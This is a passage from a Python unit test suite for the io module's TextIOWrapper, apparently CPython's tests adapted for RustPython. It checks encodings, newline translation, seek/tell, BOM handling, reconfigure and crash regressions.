b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check the encoding attribute is always set, and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertIsNotNone(t.encoding)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
# TODO: RUSTPYTHON, sys.unraisablehook
@unittest.expectedFailure
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
with support.catch_unraisable_exception() as cm:
with self.assertRaises(AttributeError):
self.TextIOWrapper(rawio).xyzzy
if not IOBASE_EMITS_UNRAISABLE:
self.assertIsNone(cm.unraisable)
elif cm.unraisable is not None:
self.assertEqual(cm.unraisable.exc_type, OSError)
# Systematic tests of the text I/O API
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
#Test seek/tell using the StatefulIncrementalDecoder.
# Make test faster by doing smaller seeks
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
def test_multibyte_seek_and_tell(self):
f = self.open(support.TESTFN, "w", encoding="euc_jp")
f.write("AB\n\u3046\u3048\n")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jp")
self.assertEqual(f.readline(), "AB\n")
p0 = f.tell()
self.assertEqual(f.readline(), "\u3046\u3048\n")
p1 = f.tell()
f.seek(p0)
self.assertEqual(f.readline(), "\u3046\u3048\n")
self.assertEqual(f.tell(), p1)
f.close()
def test_seek_with_encoder_state(self):
f = self.open(support.TESTFN, "w", encoding="euc_jis_2004")
f.write("\u00e6\u0300")
p0 = f.tell()
f.write("\u00e6")
f.seek(p0)
f.write("\u0300")
f.close()
f = self.open(support.TESTFN, "r", encoding="euc_jis_2004")
self.assertEqual(f.readline(), "\u00e6\u0300\u0300")
f.close()
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check if the BOM is written only once (see issue1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles 128 char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_seek_append_bom(self):
# Same test, but first seek to the start and then to the end
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
with self.open(filename, 'a', encoding=charset) as f:
f.seek(0)
f.seek(0, self.SEEK_END)
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=run, args=(x,))
for x in range(20)]
with support.start_threads(threads, event.set):
time.sleep(0.02)
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
# Test that text file is closed despite failed flush
# and that flush() is called before file closed.
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
closed = []
def bad_flush():
closed[:] = [txt.closed, txt.buffer.closed]
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
self.assertTrue(txt.buffer.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
txt.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
txt.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
buffer = self.BytesIO(self.testdata)
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
buffer.close = bad_close
txt = self.TextIOWrapper(buffer, encoding="ascii")
txt.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
txt.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(txt.closed)
# Silence destructor error
buffer.close = lambda: None
txt.flush = lambda: None
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_bufio_write_through(self):
# Issue #21396: write_through=True doesn't force a flush()
# on the underlying binary buffered object.
flush_called, write_called = [], []
class BufferedWriter(self.BufferedWriter):
def flush(self, *args, **kwargs):
flush_called.append(True)
return super().flush(*args, **kwargs)
def write(self, *args, **kwargs):
write_called.append(True)
return super().write(*args, **kwargs)
rawio = self.BytesIO()
data = b"a"
bufio = BufferedWriter(rawio, len(data)*2)
textio = self.TextIOWrapper(bufio, encoding='ascii',
write_through=True)
# write to the buffered io but don't overflow the buffer
text = data.decode('ascii')
textio.write(text)
# buffer.flush is not called with write_through=True
self.assertFalse(flush_called)
# buffer.write *is* called with write_through=True
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), b"") # no flush
write_called = [] # reset
textio.write(text * 10) # total content is larger than bufio buffer
self.assertTrue(write_called)
self.assertEqual(rawio.getvalue(), data * 11) # all flushed
def test_reconfigure_write_through(self):
raw = self.MockRawIO([])
t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
t.write('1')
t.reconfigure(write_through=True) # implied flush
self.assertEqual(t.write_through, True)
self.assertEqual(b''.join(raw._write_stack), b'1')
t.write('23')
self.assertEqual(b''.join(raw._write_stack), b'123')
t.reconfigure(write_through=False)
self.assertEqual(t.write_through, False)
t.write('45')
t.flush()
self.assertEqual(b''.join(raw._write_stack), b'12345')
# Keeping default value
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, False)
t.reconfigure(write_through=True)
t.reconfigure()
t.reconfigure(write_through=None)
self.assertEqual(t.write_through, True)
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_illegal_encoder(self):
# Issue 31271: Calling write() while the return value of encoder's
# encode() is invalid shouldn't cause an assertion failure.
rot13 = codecs.lookup("rot13")
with support.swap_attr(rot13, '_is_text_encoding', True):
t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
self.assertRaises(TypeError, t.write, 'bar')
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
# Issue 31243: calling read() while the return value of decoder's
# getstate() is invalid should neither crash the interpreter nor
# raise a SystemError.
def _make_very_illegal_wrapper(getstate_ret_val):
class BadDecoder:
def getstate(self):
return getstate_ret_val
def _get_bad_decoder(dummy):
return BadDecoder()
quopri = codecs.lookup("quopri")
with support.swap_attr(quopri, 'incrementaldecoder',
_get_bad_decoder):
return _make_illegal_wrapper()
t = _make_very_illegal_wrapper(42)
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper(())
self.assertRaises(TypeError, t.read, 42)
t = _make_very_illegal_wrapper((1, 2))
self.assertRaises(TypeError, t.read, 42)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
@support.requires_type_collecting
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
def test_read_byteslike(self):
r = MemviewBytesIO(b'Just some random string\n')
t = self.TextIOWrapper(r, 'utf-8')
# TextIOwrapper will not read the full string, because
# we truncate it to a multiple of the native int size
# so that we can construct a more complex memoryview.
bytes_val = _to_memoryview(r.getvalue()).tobytes()
self.assertEqual(t.read(200), bytes_val.decode('utf-8'))
def test_issue22849(self):
class F(object):
def readable(self): return True
def writable(self): return True
def seekable(self): return True
for i in range(10):
try:
self.TextIOWrapper(F(), encoding='utf-8')
except Exception:
pass
F.tell = lambda x: 0
t = self.TextIOWrapper(F(), encoding='utf-8')
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reconfigure_encoding_read(self):
# latin1 -> utf8
# (latin1 can decode utf-8 encoded string)
data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
raw = self.BytesIO(data)
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
self.assertEqual(txt.readline(), 'abc\xe9\n')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(encoding='utf-8')
with self.assertRaises(self.UnsupportedOperation):
txt.reconfigure(newline=None)
def test_reconfigure_write_fromascii(self):
# ascii has a specific encodefunc in the C implementation,
# but utf-8-sig has not. Make sure that we get rid of the
# cached encodefunc when we switch encoders.
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('foo\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('\xe9\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')
def test_reconfigure_write(self):
# latin -> utf8
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
txt.write('abc\xe9\n')
txt.reconfigure(encoding='utf-8')
self.assertEqual(raw.getvalue(), b'abc\xe9\n')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')
# ascii -> utf-8-sig: ensure that no BOM is written in the middle of
# the file
raw = self.BytesIO()
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')
def test_reconfigure_write_non_seekable(self):
raw = self.BytesIO()
raw.seekable = lambda: False
raw.seek = None
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
txt.write('abc\n')
txt.reconfigure(encoding='utf-8-sig')
txt.write('d\xe9f\n')
txt.flush()
# If the raw stream is not seekable, there'll be a BOM
self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')
def test_reconfigure_defaults(self):
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
txt.reconfigure(encoding=None)
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.write('LF\n')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'replace')
txt.reconfigure(errors='ignore')
self.assertEqual(txt.encoding, 'ascii')
self.assertEqual(txt.errors, 'ignore')
txt.write('CRLF\n')
txt.reconfigure(encoding='utf-8', newline=None)
self.assertEqual(txt.errors, 'strict')
txt.seek(0)
self.assertEqual(txt.read(), 'LF\nCRLF\n')
self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')
def test_reconfigure_newline(self):
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline=None)
self.assertEqual(txt.readline(), 'CR\n')
raw = self.BytesIO(b'CR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='')
self.assertEqual(txt.readline(), 'CR\r')
raw = self.BytesIO(b'CR\rLF\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\n')
self.assertEqual(txt.readline(), 'CR\rLF\n')
raw = self.BytesIO(b'LF\nCR\rEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
txt.reconfigure(newline='\r')
self.assertEqual(txt.readline(), 'LF\nCR\r')
raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
txt.reconfigure(newline='\r\n')
self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')
txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
txt.reconfigure(newline=None)
txt.write('linesep\n')
txt.reconfigure(newline='')
txt.write('LF\n')
txt.reconfigure(newline='\n')
txt.write('LF\n')
txt.reconfigure(newline='\r')
txt.write('CR\n')
txt.reconfigure(newline='\r\n')
txt.write('CRLF\n')
expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)
def test_issue25862(self):
# Assertion failures occurred in tell() after read() and write().
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.read()
t.tell()
t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
t.read(1)
t.write('x')
t.tell()
class MemviewBytesIO(io.BytesIO):
'''A BytesIO object whose read method returns memoryviews
rather than bytes'''
def read1(self, len_):
return _to_memoryview(super().read1(len_))
def read(self, len_):
return _to_memoryview(super().read(len_))
def _to_memoryview(buf):
'''Convert bytes-object *buf* to a non-trivial memoryview'''
arr = array.array('i')
idx = len(buf) - len(buf) % arr.itemsize
arr.frombytes(buf[:idx])
